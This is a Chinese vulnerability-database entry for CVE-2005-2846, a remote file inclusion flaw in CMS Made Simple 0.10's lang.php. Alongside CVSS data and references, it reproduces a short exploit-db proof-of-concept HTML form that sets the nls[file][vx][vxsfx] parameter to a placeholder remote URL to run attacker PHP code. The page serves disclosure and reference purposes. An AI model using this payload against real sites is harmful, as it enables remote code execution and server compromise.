CMS Made Simple Lang.PHP 远程文件包含漏洞

CMS Made Simple Lang.PHP 远程文件包含漏洞

漏洞ID 1109042 漏洞类型 输入验证
发布时间 2005-08-31 更新时间 2005-10-20
图片[1]-CMS Made Simple Lang.PHP 远程文件包含漏洞-安全小百科CVE编号 CVE-2005-2846
图片[2]-CMS Made Simple Lang.PHP 远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200509-095
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26217
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-095
|漏洞详情
CMSMadeSimple是一个易于使用的内容管理系统用于具有简单、稳定内容的网站。使用PHP,MySQL和Smarty模板引擎开发。它具有:基于角色的权限管理系统,智能缓存机制(只有当需要时才会从数据库获取),基于向导的安装与更新机制,对系统资源占用少,还包含文件管理,新闻发布和RSS模块等。CMSMadeSimple0.10及以前版本的lang.php文件的PHP远程文件包含漏洞允许远程攻击者通过nls参数[file][vx][vxsfx]执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/14709/info

CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

CMS Made Simple Version .10 and all prior versions are reported vulnerable. 

example.html:
<form action="http://www.example.com/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
|参考资料

来源:SECUNIA
名称:16654
链接:http://secunia.com/advisories/16654/
来源:forum.cmsmadesimple.org
链接:http://forum.cmsmadesimple.org/index.php/topic,1549.0.html
来源:BID
名称:14709
链接:http://www.securityfocus.com/bid/14709
来源:BUGTRAQ
名称:20050831CMSMadeSimple<=0.10-PHPinjection
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112552342004406&w;=2

相关推荐: Lantronix Secure Console Server SCS820/SCS1620 – Multiple Local Vulnerabilities

Lantronix Secure Console Server SCS820/SCS1620 – Multiple Local Vulnerabilities 漏洞ID 1055309 漏洞类型 发布时间 2005-08-05 更新时间 2005-08-05 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享